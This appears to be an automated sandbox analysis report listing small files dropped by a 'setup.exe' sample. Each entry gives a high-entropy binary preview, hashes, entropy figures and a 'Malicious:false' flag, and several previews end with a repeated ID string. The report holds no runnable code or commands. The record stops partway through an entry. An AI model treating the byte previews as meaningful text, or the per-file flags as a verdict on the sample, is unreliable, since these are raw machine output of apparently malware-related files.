              Preview:<?xml..@)N.".=.......d2._..q.DP.J.*...B.gY.....y.......a...u>r.+.).6.J.-.w0.-7...*.l..i..;09...JE..(&WT.{...$......oy..A...f...... ./...$m+v~t..r..+....9.q..H........{.."8....N/UL.*L.$.$...N.?|A............z."...D..........O...@..5wbT.........U....G.WG......\i.\@.b..f..c.Du..b...\.Q...(.S.+..-..............."...d.B...?kf....ByU..K..A..)..[.n_.....K...~m......s...!M}.N8..._.g....A..0`.G....i..[..uG4v...0BF,.?r...v~.. to.0..5...~C5..'.9..>.<.,J..$><....2Q.h..i...v...cRd.~a......)...`Z/[......G.Ur.`...l...6.hb.|......Wi.}.b0B.Yy.U....w.)..TJm..P......i..{x.....M..-.n..1.G.r...l.s..R..XY..c.....K ..M...mr{......[3@.....x..........ndx..R..........X.v...{.mGt.N.....f..Ks........t1(....q...F.D.....r....j\`$Q.U<..}.Ct4r.+w.j.B##.Wl.k.[.h.C...x.5...v{.....{f].Z...../.3..e.......P9H......%w.%.x..9......T....P:l.C.<.0...mtO......e....&.! ]..../.q..KY.......6I...7.N.v........`.A$..}4./...G...kSi...L.D....=.qyN.R...B.MJ..q.@...T~....Z..GD..L.c......D....
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1815
              Entropy (8bit):7.879340836619754
              Encrypted:false
              SSDEEP:48:xqoI+y5B1s9J6JIQr8ArRsG/1NPxzthaD:61j1S6GQnrRsG/1NPxzthy
              MD5:599A8AEFF184C225F556A5E8618CC180
              SHA1:15B5BB875149C1FF02C5F1158D29CBB96311F4D0
              SHA-256:35C2CE882F1A35F273EA2EF813BD026FBC4FA41816D3C8CF2254FB08E78EDBB3
              SHA-512:BD977CBAD03C547B3D688C7F5A8FAF7D3A573B92B86239FDC4CA650249B84D6C4095C4D67E27D2EB4F7B316DB8ED865A961609960DD2453BC4D88E9C50A7C14E
              Malicious:false
              Preview:<?xml~T...zy&..J..f.+.o.?5........TQ...."}.....k:Wa.qA..SH........G.P<lv|.WX.....7..^.....KP.Hs.oW.t/.....U'`.....@..5qJ@....v.@_.N..3.e.#9I..GW..3.q.P...{=UY.,.+.`...i..7..`.X`.....M......4.{.~fi]..1..mq...#.1T..[W.....~D`3...H.&.....!..@4s...U...=5..W.]m.....}....<mJa..T....E.|..:mYpx......R.`.....1.....c#..R.....7E.2.l........:b8.Q......r.j.K....Z...v.a|.;X.........s...]S3.F.:. f..mZr..!..e...E..5M.-*.L{...q....^...\.].U...W.>...3..A.....M....MD..UZ..k$.....&.).y.C.rRU?.......|.\..........u.e).h.t..0....z...=...w:..o..Q......Zi0N..:.n.o.....g-i.}.s.h...............2./..x..h8..6...X.}.~.[...o..E.f.~...N.~..7..+.jP.#,H..?...B!.`....F.\m. !/...q Tc..zM....V..G..|zh.v: ..H(l.g..4.gL..a.h.s8.....)z.?.`-5".IT....*'.3.....y. .nT.E.P{v....$l..1.#].1.*>_T...V.....c2..n....K.B.i7...Vl..w.LH.`)...FB.z?.P.\..)....BnD..*.3....G.7...`.,=.@..6.....ov..../..3..H...8..q.....|.A)+-...N....rjst........`..<...d.B....8...1..^~AB.o.pM'.x....r?.j.}.[.....
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1004
              Entropy (8bit):7.83121075579073
              Encrypted:false
              SSDEEP:24:Ypls3LnuvvHMPDI4mfLvktjz3fFr8JEFiJnwuTbD:8lobeHM7I4mfLvktjTfFvFxeD
              MD5:9B875144CFAC237C88BD44179ECC8D50
              SHA1:06941BCE116982E1AB524FB62F5726F50D71A94A
              SHA-256:3FF1FEF1606C364AB987D2A01F5C8DE6361E28475DA59A3B5BDDA6D1146C7A7F
              SHA-512:369CA82037F0D43FEF229992E64C40DBB35AFED9685CF8F38C652E8C8B46F35019DBF90CDB2192FE869D052459710762E49472179F2D5B6B3657858954FDB900
              Malicious:false
              Preview:<?xml%:.{.j..@[......8.Fj.V.-.#.....\...ANJeN..<|.?x4.%.J....']e.+'^p...N....o.oL....\C-.r..~.{n...........d...B.v...#.w......9..\>g.O...;N .....S...`U.8.X.........4p:r..j..I*...@.Ao...#.o.1.....;.Nr..7H$..#......p..HI.S7.. ..c3.9...Q_C!v|....qp...'....h.P.\_d.f..:.=.=/..%X...t.H..e...3.OJ.t.#.J...H'>Up.O.hC.D...%..C..F..z.M..o$V3.3..QQ..".m.M..'.......P!..2s..o...T=.}..u.h.H...~.=.1...Y. <U..[...z.A+`g..k..[..-...=....h...s..X....H.E..W".J..{..gi..~.......IS....G7..X....E...5.^.^.........?.M.A...B...N.T.....6..nz.."..~.d?..)..z.X|.Wn....}.1...!.S.}m.5.B.......R...1.....LS0.)...Tp.fV...o..=.....!..u..e.[.a...Pk..|.@..U.<........\..|b.s;..1 Z...VT"Eo....s...H..T......H....k.`.Qt){...jj...d...#g.a<...s.6.(.O....Zo...%.......]..i.U..*i..k...."Ug.K.2...."~.L....>..|.$`m...sJ+. ..Ws.I%.k..YPX.q:..wix7........t....[ @...,........Y...n.(cdY.9.%js...I."-"...l..e5d..*........G.PVrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1950
              Entropy (8bit):7.890133874734854
              Encrypted:false
              SSDEEP:48:zRrknfDlZaCwHDyWHQelVf4b+YweyM2G1k6FikD:QDPaWu/fFO
              MD5:7F7927AFDE7D79C6EAE786796F698850
              SHA1:DCB34F7C7323A274376D38F72D6962D6B68A32C6
              SHA-256:5B8C704411569E3EFA23FF060CA3389E0CE0D02ED46FCEBC89D697817CF5DDFB
              SHA-512:9C5ADC090B409B58EDCE3B61CF1EB8514ACA7CAB0C929A445A2671B5C6F204E4A4E5B9603FC065A4537BAD497E7235164C245831686ACE9F79FABA26875484AC
              Malicious:false
              Preview:<?xml.....`..6g<.F.B..gDS......L../\....b..\..Y.k..W!.W.x......8...'x..."...,<..BkgOg.A....1AMo,.a.7wF..o.:..z.4#*S-....ni.9....\x\..n]>....|...O}.G/.@|....4_b.1....h>...../Y...h...f.OQ.8.\..T`.....v..T..@.k..+N..>_Nh...QU.T.......v.........a...@..np./.P.'...Z&f.....).(8.4..C../...<....Aq....8..9;..!3.Ac_..w.Py.+(..........y.yu....!..f?.bz..v..Q.. ..`../.@...^OXU.X(F......[2R....-bQ.....k."[@I..^.mv..T.&4{,.+J.?7uy6..kG...#.?a.e.y........4!.I..~.H...4.!AGKt..$C*.x..<..?E..4.@.FeX.-.+bWL.D..9....:t...o.....X..Q..$...\_....j./..)..=.._Z...9...G.*.f..5.8Cz.Qk.@.v.M.........&......h...a{.*a!.44..m.'.....o.)W...=..t.gT..X..Zb...Ep...e[.s1V........V9=.8.......*>..e..j...^............t|.....\*.R|.s.....q.c.y...o-.......5.....|..e....l...i...S....a..Q.. ..,S.68x]q..D-.Ix.i.C..|......Hz2VUN.F..z.K...~.Sjw.M%"L^...y...Y4.4./...5.A.S1.W.H(....i...W.]......O G.J...].....ZP.B..m.i........a.p....^R...V.~c....z...5A......F..>...=....P..:+...7.V...
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):4121
              Entropy (8bit):7.95331804180479
              Encrypted:false
              SSDEEP:96:mhTod6U1ebiFbRIrYSzx9nc2H6kN4gyWPBV:kw6UEiFbRIrx9n9fN4gJPT
              MD5:05FEAA92B0D1C3545E524B5666DA29FA
              SHA1:518A703BEEDFA8F50C6D6B4F85DA6D06F5A1412D
              SHA-256:D9EB47893D035F4BDFCCD413DE68CD0269652C239CA1B8C95F934FF4F0CE30A0
              SHA-512:92CFBB254D8763F5790D09FF64DCBC119556446D880EC886554DAB712DA7FE5E20A9BF263C3AD2EB64092E28756A1F90FAB6BB898B51EB3F8B13C871ECE03CFB
              Malicious:false
              Preview:<?xmle....%.G7+TiP.|Bn.I.3...y..E..v&6'W....h.4}z..qP%...g..m..g........n.PV...Zz.|...0y...8...q.V>.!w..x...G.O.(........,....eL...1.....".~..N.z.)Y$0..ZE.B..H..-0...........X.N./j..t.O;r.Mx..<c(.M..........XCk...)8...eS.._.&..Z.o:/C...f...9.O....z.H.........B_B._..P-.&...E..B+v...i.{.].R..c...`G^pc....Q....7.....I...8]`.....-<S......Vu...............KD.!.......O5.MaP.c~i\W.m=".......2k.<...;R..C....\..6.E!._..]1?..2.2BK......k.W>...u.a.o.....uk}.7(......+@2.B...EqL..y.Y".8.O...q..-m{.@.d.E.[....\..$.....OqX..j..p^..v........#.s..L.'O..>.0.m.NJKrO.......k....k[.t.P;......SOV\".....*@.eW..,..`B........n.W'.....J...uo.F.....{R;..RI.a..D...w......szcd.-.P.N....G.,I.m.;..k...b1.'..s.L.a5..O...Uc....)..M.h...0..Kl........=+SP=..o.A.!n........JR*......>.aCD.0...j.d..{....0..b..n.........ds..N.jvPEh.z..-B.... .a."`...E.@?.u....J.J.+..........hY......>g.?.......9..w.".!(..e...yc.;..,\.1.........t.cA..j...X....... ;..\..d.f...J......v....Z.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1585
              Entropy (8bit):7.890544993122856
              Encrypted:false
              SSDEEP:48:FjBDsiNIR0N7zQ6/gi1UP9UbXMUc49A1a8D:wshN7LLUP9UTMd11
              MD5:230578401A014A8A7B776476E9992748
              SHA1:CB5E34D3FB413EAFAA11D2189190445D7CA5CD18
              SHA-256:AFEC667723F4BD33A3F8D3056DBC40D3B834CDC8C6A15956653F3836B7506389
              SHA-512:E774C7CF537B1227CE727A8A417D5A915A080AFB5D9723BD9D46048012D0F95F7F62C4920801C7F2B225AB4959AE82EF2902D799002EE6591AE68F0D60D66C25
              Malicious:false
              Preview:<?xmlPs..F..2..?....[]..~b%E.._...;&|E.,.To.. $k...9!z.z.d..K.V:Y..e.w9.-"..Z.*..M.s.f.2.....Q..8....F.Z..X..[87~kQ.OG.3V...KQ.X..S.r..r.i2U..^..Y.T..>..p?V....Di=83.B..MY...-...o.R.W.....W....{`\.c..u.4..Sq....=Q..|.v..R.e(.....9..._J~....*N.W..wx...{"az.3m....`...W.<.&..5.n.e..4x..V...8M+...(..f.&.._mI......}....Y+d.e|..&..>@g.^,....U.~p/.|.52z..../....v...s...w./.v.Z..&.....?.........Hv.{A.....g@.......N..#..v#.?........:...SZ?R[B!.]^.#M.?r].'...I'......(.K.,:>.....B.L....c..q..]......F(....7.O.".m.[.`......i..7'....a..0F."z.y...,..b0~5.WF.w.....s.-AH.2..}...,n...9.K..~8{.g......:..|pFA<.7....9+.;.T.Oh........P...\Aeh....;X.I....n\5...2Q.......:o.S.J.T....P.D..J/.....N...p.......%Z.`|...y...C.w.fh...h*;.X..s6....?.8jSc....?.(']....I+}.[Za.....D.i;M....[.....B.T6..N.|+J^...W.k.8..k6........cs._A{..g.jKD.+C...l..J,..n...R..WpZ..KQ....L2.(....G.H.l.F'...IV....E..l..7.'H.....3Z_.PR.*h.#.u..F;.. ......X_.[..R...t.^+).........1.>. .....
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1939
              Entropy (8bit):7.912492286655542
              Encrypted:false
              SSDEEP:48:HoqBOVE1zXBwh7F6lOf3aP5sWvQssizMrTnjluLE2D:Ikb16hQlOfah4ssizCTjILEu
              MD5:0EE244E3CB3F5C5E5C37B74C9ABD958A
              SHA1:9B79708160B674F535B276936255FFB5E6AF6E19
              SHA-256:B30B44D597696AAF7CCF1C393AD45ED04BD65F2B7661ABDAA56CE7BEAE0D4594
              SHA-512:7D9F91506968B8EBC832BD95C864653977D8240A740E30723263F476ECA2EE374A06921B637617522A1C75D7D1FF75B4506BBB48F838E573442D1233C011D0E7
              Malicious:false
              Preview:<?xml..G.W.0...c..S.r.1;.&.>|+.&56.*...5.qe.|S..6....C. .R...J....v.%'.c?......eKn..D.k.1coU..5.^..9.Ru...*.{M.H.Z....y..a....{EJ....).-.Tu"Aa.L.m..n-.,,]pM.l+...=.w.m.)s......v....f.|..+{.j....Y4.E.B....zh.`^F.a..UUT......o......m...)..r.xP..{.(...*..A.i..I.t.A.k..c...(..0F.J...m..f.K.{5 e.u.3..h.)T..{.R...\..._.2%E.b.$.........t$..8wt..NrP....y.a.......t.7..y.ff.d..,.9.A.w.....'<.SC5.* .;2....e.....mj...>hd3...s.Iu|K.g.8.."......].'.|2i......X...!..ka.....e.<Qj...].. .]].R~L.y...........o.p.j3...fW...gN.b..t..f.{..e....<M..qu5..1U...Y.H....Cq.Z...<uB,;.......)..X[..s*-.4..(`Yl.....O..@.J{.=I E..1.."...,-L..j...;...*..s..!"C].....>X{..N....z+......aR..a...+...?..<..uZ...... s.}...Rw.Cews...Z...b..R.j.r9......J5).....3A...".g.......U,.:.1!.....?..yu...$.....rC.).t....@M..}.v...<..7.....&<....D/...:...r..l...*~.:..} ..^%....^.g....i..=.a9.....n.c.P.mdcH&..}A....J.8..d.i..)...i=......IF.z.T.....5.Y.[.K.#..Au.m.@rwG.{..II....8i....
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):3091
              Entropy (8bit):7.943933636013407
              Encrypted:false
              SSDEEP:48:d/OfUfxfSQxYc4Dl5faN6wBi9w/tHFhfl22fMyLAY9MJZAuerNYI0uJGPJlVD:EAx6HxkN7iO/jW2fAYxuQKI0usPJb
              MD5:739615772E8CCAE9A51C2D907A64525B
              SHA1:20632C712321655A8E33BF896AB2B4BF5CBBC3DA
              SHA-256:F9EC1E442FBEB36D216F8665656437EF1BC930C3AF9950149BD49B4AA1DCD86A
              SHA-512:FD8B71B50B841E12DD0E6788AA0DE32838FAD38C76C3F6BDC90402195D5D928BED58ADB9F5F3845C8DB65EEBC4E512C2F4F93781840BBE2E1EDE34254601F6E0
              Malicious:false
              Preview:<?xml..N...|[}.:.U.g.F*..l..0?...7....o........".f.D..i}.*."z.f$%...X=P....A.y.D...l..N.u.5..>@X3.wD0u+..4...1.........1.?....>......y......].V.:........JR9o........~...Bz!.......:....#C.l.0g.=X..A.....t7.-.)L1....zP*.D9`b..\.0.....]..S.....8....X.$..a;.Htj....$.n..._...B...&I...P..W_T.;O%..`..xlHg?W..j&.g.|[..W....2..be..dG...G..."..y.tJ~U.Kp....;TAgi_H7..%..Bwy..^...H.......{.A#...t{I.t.=..5_Lij..u.A<.L.........{.C....V...:....v......m.....j.........G.4c,..&.....e<J..^...[ ....x....a"..k.U.{..,:u2.S<).<`&?.O.....r.....g.J g...a..w-..0..hz#.M..L#..$.&...jQ)Ga..*Y. .Qh.4.&..|.T.......w.Cl`E.q.O+...f~3...hh...;.5<i.xg'_......9.j.Y...zy.2k.i.&... ..h...h.q(.nWad $.w..;C~...;.:- ...\Pz. .T....j.*K.H...Z.k7...4?.K|.\....E.P...o.\..o...Sa.......*.@...o..P./...E......f.P%>.1:...7.8..j-.@?..........6.S9eo....._.y....~.U.k./6.zkI.h.Fhvn..0...e..8...5...4...yv...ju..=.4...O.......\...t..>r..r....s.#[9.....d....$...!l[jS.x.)f>.F......G..i..bi.......Q..'+%...7
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):980
              Entropy (8bit):7.772537924691195
              Encrypted:false
              SSDEEP:24:hUGHUvc80UGaGk2uZn/trxp9KsI7F6WbD:hHgh0XaGk2+nFrxGsCFxD
              MD5:E958E79C1A49FA57CB0ECE9AD7A51B15
              SHA1:78042EE72E5AA812A3DBC61C29F242A8AA0A9EFB
              SHA-256:2DD3B2DD3C273F91E36EA7C65D7B10B7B7F78F38429ADA8535507744466AA19C
              SHA-512:016603DCA1F7AEF2D685651093BBEC0DD272E6384124EE12B2822B72D4A5BC677E633D91539B9E5E36649DE1827B2942DA431FF5AF888387D512067C85D2B6D7
              Malicious:false
              Preview:<?xml..L.,..n"SZ...&(..P..~T..x......k-.YJ.(.mJ.+ok..w..]2....H.T.mi..Av.:..*..4.>..;.R......I....^^.9SR..d...o...V.29h.%.4@".~.}A.....M-. @(.,._..{.......f....k..pF ..N...........<.O.9..A....t.&.........T..:.H....>_..nY.6/.p..!9g.yq.l..x......=...U..b!B<...TbC&....0`..}.v=...=M.J..>HZ....S..c...}.r.]|..l.-0.1.2.9DfK{.#"..K.G..#.^e..]..j.>...i...!H.w.g.6....U........#.8OP.H;...>.`.d..."XS.*..Nx.=...W..s.*<.........}E...,<..,hinO..3..S.U7.:....3.Y..8V."LH..!.M.6..R..1.O..C...............WA!..Se.......C....;..|..8..n....%._.j..w......8.|8..Qj...y.a..U.=.9..?.|6.{.>.P..]...(.o.7JO...WX8...`5.L|.gp=......S...z..4...dN..A^....55O...#.7.p..a.H....8...+..$.:....;`..8@.......U...U.*U...".Q./g3...I.".. .6"/.....:7.?....n.xT..y*1|k_......'..$...9........wi.,.......^......C../...N.i.....!jA....._.RhfQ.R>.ew.*a..=...`..J..E9.........!...&...)l.Xv.I...-c.VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):2404
              Entropy (8bit):7.9251539592732385
              Encrypted:false
              SSDEEP:48:A/0LhCM4BPRnywvyOYtFTG3HFWGjM6qdsIomwd80n8tJatoynD:CshCMeZywvyzG3lNjDqdsQSh8n6o6
              MD5:70855344AD36F0737B6DB06EACCDFACC
              SHA1:A798F4A930791875E161D35D9DFE746A4D0AEA8E
              SHA-256:1378AAE0FC0546F46142A8776A280EDE4D1825D9CDFFAD6A376C33CE4F4758B6
              SHA-512:EDB1E58C6C230900C6DED03D5FECF791840F5D2076F95A40017A4155FCC5BFFE2DC94C420C0B0C5C4E1EAD8929E9C3962E7C71D83C1DB4C0F3649362F53CFEB1
              Malicious:false
              Preview:<?xml}......edgfT}J-._]4...yD9dB......)A&.I6d........c.+...8.....>V.l9.......%.02.....IRm.......9.J..f}..(m.r..W...Z..{.i..xMm..'`.p....k..M.t.I3..5.^....<8G..oDVa]..Bj..J....X.n...Vz!....0....+%_N ...QD0....P.B:.4o.H...0<..zcrr7.h...@.G..ZF..O&...1A.]5.....Z......_5.cHod.....9...L......3a..*.`.~.[..f..Y...H.z...+{"2f./..c..z.&....:...~..>p|....V..........(p...*~..}.J..2.\s.@..z*y5...D..@u.\z.-.....1.....wMT.5!#..0.....4.Z..))../....~.E.'K..8..ds.W{.....4..|h...J.).u....p..{}.c.v......Yq..\..g...7...u....AgL*.Jvx.u.r .2.....2@...l.W..'...9....M....+..(R.H....cY.Mz....?...Y.J..z...<../9..p.;.B........-......a..Z.g...e..d?g............X.U.....6.z.A\...0.c....^..j.c.:6.m].o.%'u....Z.c".......... ......S..@t.Ap....9.tb+zH.Ne8(......K5......S.%.....D7."F.y....V;........(..}.{.9{.b$....W...."g.w.cV"...m=.1.7....s.J...XU..f.wI.D.._...v.......D..nl..L6Go.~s.!{.@wJN.....9.p.|.R.....xq....i.m..+7?...Oz .G....+.......^.i..Vs.Z..7k.g.q..._....T.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):3203
              Entropy (8bit):7.938947207339584
              Encrypted:false
              SSDEEP:96:zYh3XybnVXkEwTvkN4qwRfFeFhis4wtNr:gXyDODACRNeCq1
              MD5:2A2E9000650A9DE5D8200BD19C5DE3C2
              SHA1:46BCCF9E25D539CCC38248A76B0BB7E073A8AFFF
              SHA-256:26B924DAF31C8DA9DAA830AC28578EE4B3A7B0CCD6C5703CCD461A243284A831
              SHA-512:8F2A4AFDF1C10E7D0056C98B9959FF5F3C94BF0BB3A0DB629128B0868F1F78D79B3B87945846B4A449E1EBD532345C727A41327406DF4F116B83105748FAA84E
              Malicious:false
              Preview:<?xml...q.J..YE.-.....&.3.@..K.y@..]..rF.:...7..._..... .".C.}...d._yF... !...H@.6.K..qju.....SW..*Oy*...7.Y8.JS..]..5p....p...m.K...`|Z...a....(.;|..[....`..t.2a6..=...D...)#0...e#.........W;Pyfy0.a.4. .X!^.D.b|`...HNMo........[F..@..$..1cy.T..6..}l.lV<O.....^.L.j......&A.....}M.....%.B1?2.C%......M4.q..2.=h-\*....GB..<.8W.6D1d....\...*T.!&.yP....6..U...;.j....^......5n..G.J...&......1.A.F.8p...3.......0....#....zs....9............_..7rDQ...<z.dI)...6M..h...<r..A..5...\.Q.".^...7T.c...[p......\V.I.>s..8..llk..R..|..K.>..Xg.D.zT.W.`.M..........}h=.K....s...yyx..5....g+.u..nP..=.0.6:.5@*.7<.c.^.=%....AH...m.JQI|......Qn...k.(E!.7p....#.5.).....}....W7@....I...I@..:..z.(...`..J.[D(..,.m....j...v3.>G.e#.S.f..`.....g..j......E1f...uL{t..85E.......G*./..=...X..W..G..Z.^5..CcV..^b..c...`.D].%...!....t.;W..$.4.5....s.K ..s/.4............,;=.........7.S....5k....X....s...E....H.T.f.I...Bn....p..^.q..+....^.]..=+..$.,T..]._h..Jf.Ag.......s.1)...1.....5.*
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):2512
              Entropy (8bit):7.933216417938471
              Encrypted:false
              SSDEEP:48:qVzgob6JDMCpPR4AgWrDzWYZlTh2eKKqiy2vGHVD:qduPpyEuYnh2eEiy2+N
              MD5:AA06CCC6867A73C81E6EABA5DDF6FBB4
              SHA1:B31C8D2EE7B01256BF48C30E76883ECC30B0EA5A
              SHA-256:3A2AF692340DEB96AE951B4C26770AC60583D3330F0A708A248465771DD61F76
              SHA-512:E301D11C10DA8239538FB24DD89407134C8D3E306DF851A3F0615BD690DA2ABC05D4E2555A032DDC87F95B72128DB99A640B731A830B32D339B989728F8536C3
              Malicious:false
              Preview:<?xml...|.l...D./To.].q..g.=.0B.5lD...X..#.*.9....V..V.G...B..d..*e.[%....Mq.O..Ix.).>..(t..5t..C..<`...S.`..[.{.......P^..|4"2....z...X...RZj]F....>.61]..g..i9..5.#D.'..}e..f.Fk...]..%.."..O~.P.&v.X...}......x...2..R.xF...7../.B.......#.I...$wv..wi,..:.|.X.T.*.1T5.o.Z....8.H..e.nVmcC...*xSJ.|/...)I1....w....OcNG7dE....l..S@.1....O.4%X.L.U...Y...<.pK....M.l....e....J0...@.._.5%.[..KJ.."....o.......;..d.+...`.E......l..T..$....z.@...VN;K.}.rz1...."...;..T....x..?....!...H. R.(..o...yDc.6..{a.E...L.....P.A5..D......w....lN.S.....e7.+...3F...e.q......z.&..O.i7W.....W....u}.Am...4E.h..<.9.2..94.!.#..q0...C.?.W.......s...Xr*.e.~......$1...R...5.x..Q.....[...L.6..@D...P..I..a...A..s=$..|.cB.3.F..h.. .33=..e..8..Bx(..Ex..Q... .V.z..7.....o..u.)st..R.5.\...T..........O..mB..s..-y.........;{.....Q....6....a:.`0..*..-.[...j.a...Q...U..:...lDnl...*..)).~b.<.7.....W...nMt...J.f<..y'..+O..g.,K@A$.v.(Q.M.5?..Q.=..5.....Y<..z.;.]V. ..%].Z.z..&.0.].
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1247
              Entropy (8bit):7.81286983910048
              Encrypted:false
              SSDEEP:24:ynO1COsyqo0d+AiePDeb0ccs5ShkS8Pu+8wsv4lpkiCz3ubD:y8CpygdDPKoK0kSSu+wv4lpkiCbMD
              MD5:C4117D932691E8CE3F12CCEE1C85AD64
              SHA1:A9075D533E3B108F0EF2FF5E3C64877FEF6CCFF0
              SHA-256:95925D58F405B5DA0FEC1E3A9AB0B38C088E822CEA54D17688FC5EE824E6E0DF
              SHA-512:EEEF1FACB6D8CF815919AE53FCAF33F83C3C0B808C79D6DD1CD6B8C798CAD6502D4E6708AE5C1941E290A9E91930968AD0CE0A4C8E2F9338AF1977BFAE6A9E4A
              Malicious:false
              Preview:<?xml..8...T......C...Y#.y....$_\OT.aEs9+T.N%.2.bQ.....".g.ba.AH.A.T7..|......l.......j.[.....w=....di.*..../#xR.8`.6.q|..M..1...^c..2...>&.n.Z...h$5?.U..k.7O...8'....l.H.%...uW...%j*.W^.@.....=......9.q+*..3P.5.R'...gV...m-D.G8w;.....yB.7.....4/...53-..3#.B{......'.&.....{..M.A..x.l..J. p2a...R..q..d.A..c.........q.jq.f.>.. /.3...7.a|.B...."......v.D.!..m.~1.h.8.9..Re>.d..T..>......h.8...:[|............s$.6...0..o'V}.C...z....f...2]G....U._.cY..G....F..C...bl.p|....P.-L?[.S9.7;.).......2.k.1yj;.@pTf..B.....f{..T...F]}.U.tTA...p........U...R%..lYD......x...Oq....n.A..#.B..*...>f..d>5.vK-./.hi..Q..x..^............Y...j.fc......w.L.....K .{4..!E.a......S...,...U.........f.cA.8.......E.^=.-?Y..b<.....l.gd.ie.+...?M..:X.6..&.....d..lI..........|.i.R.}...q-{.#^.II..9s...T..i....~....r8.._Bo..@.b...b..!.l..=.;.x$.[.Yr\.$....$...J.-..u(...,~......C.)4...J.....C.;a7.....`....[%t..#...qOFp#..g..\.pP\r.dOd8.......E.UR....'0....+.d.......u..c6
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):950
              Entropy (8bit):7.733939064914241
              Encrypted:false
              SSDEEP:24:oHXDzPi6NyFAGdIwZUEd/D38U5IGgbSPLZS5bD:o3xNGZUC/j8UrgbSjZmD
              MD5:54429717C51A6620B22B68334A64F5E8
              SHA1:EC98AD1A3BD9311906842FC1343678A64137AC78
              SHA-256:37011A64D354CDAB939F71FE1D594235BBD87DB1330D4B780B8C4C13F12D6CE5
              SHA-512:6962773A903091307D1B73660883985F80BE0E3A74031E2C36EC293D8E1F819AB6785FE856601B32838E59FDEB7366B4CF747D76E7BBE0CAED0182951CCEF1F9
              Malicious:false
              Preview:<?xml3..ia..br..t..z....n-.[.Q.....km.f(.>..p.K}&.R......)k..\...=.(.F..T.)..2+*l,./....M.X5+.^.._f.."......Z...i6.]f.<........MD....(..9....._.4.<...m.K...l^[.18^cf%.rP....V+.u.x.U..uZm..c2.R.c/...m.4g...gf.{........k....H...K....._fnPj...{]..#z.y(..+......".....z...q...x.F....u........i=.9..rzg..%9.K.V:.U..r..Q.......N...Em...I.IM..i....|.../..o.D_./K..].O......us_.W.......)......;)3L..t..H.1...L.iqc..1T..h.nS..7..P."..._.+..x.9.m.E....m....'..*.L-...t..'..../.....3.A@.3.s?.J.s.L.o)9...1.....W.Nq....C.C..D..bt..d.Kr.k.`J..'.y8.y:..q.?&..5..H.#G)f..X.....^..`,`f.v...$..m....O.1.`.J.4..^.<P....X....XYln.F~........6]AI....3#r.,..j.DH.k...D6..@^F........N.BUN\I.....;1..j>....c.J%l.~..'q...B.. .......x.4.9.h;(.......}.../.X.8!....(..3..|.....>e0.6U...6I...-US)+..K3...2..BA....a..){...e2..T..q....D.l..g..o @`...u.s&VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1125
              Entropy (8bit):7.86302794959779
              Encrypted:false
              SSDEEP:24:0xagP9vdb8TsQZpz0g7hiDvXiD9Tm6YaRpE3DCOHPIp33rWbD:0xagvbGvZpz0YO/ihTKa3E3DCOHPIp38
              MD5:950821E0AFEA6ABCDDE770399DA98354
              SHA1:7CD18699B42A701D56AEC1FDEC6BAA43DE85EC99
              SHA-256:5BA410F70CDAADB9E19588B087230C46DE154EBCCED8FB74AE68C69B23CA0869
              SHA-512:1AE601316E63C3FD1AB351588A3CC1F6E8B3A7FEA812A3C0F0B6BEB772C15C1AD66FF4C8FC6E9498EFA8F70280B302E3474C8B25F39C8DDD572C40942EF8A8C8
              Malicious:false
              Preview:<?xml...=.g.3.|[..|... .9........P.@..m.....P...Wa(.".j^.:<!.../...e..oG..{.*.~..X..H.]2...Q}4po.Aj..\x..A.7....m=U..n.Ij..G..`.;......|M..a..S.pp.}&.L.>.,.;... ...C6P1x......M..=.d.y......Rw....z....1.W....&.X.G.~..v.r....Z.+..z...Ii....o...UL..9.w}.Sa..z.[P.;..G8..UO/;.m.$.S{.T.x......y...7...!8If...M*.JT..k]..g.k.(c...*...4e7wK.;pKF...R.eO.+v|.Q.s.....:B.HH..ag............*zt]K.....<".m......sz...8.k..O.%N....i..-Z...5 m- ....$\...2...k..gt...F...zX.K.>.>.H[H_...Teh....e..|Od.^.i .,............N.......o^.:..6.v......2..HE.....%o.w..)../.......{.@....t.<<..O..>Lh...5...hf.Z.#....:.D..P...F3...].0F,~.)..!.t2..aN.].%.b..8.%..!V[O>$.dm.A;..{-......<.!T..G..F+%.=.*0........N....K'UR$'.;..N..]..b.J_.Y.........|j...:.Q....?=%.....G.x.......,2.....C.... o%.9...\.._.U....r.[. ....W.(...5.E.k.....U..%.G?.4t|.@6......'.........l.FL......D...#..#.|....9.}.b'.....*;%..I..d&.x..X.....y......s..au.s.4....U.zpy).....X0m.<..L7...1.P\z.......lkl...) J'
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1121
              Entropy (8bit):7.834785425537726
              Encrypted:false
              SSDEEP:24:ifOJKg+Y18qYfNuBCz00ToQ0zvFueLzLVW8ss/lbD:vEg+Y8qYfNuBlwqPU9AD
              MD5:99442A1F1EBB0C80A099A153EE2E822C
              SHA1:FDBC8AD941D05F0110AB5BF461620083862ADFF4
              SHA-256:C8CCB583FD1237D5EDF134EF65F7A089FD79841FE3F0D125DEE20250DDCE2879
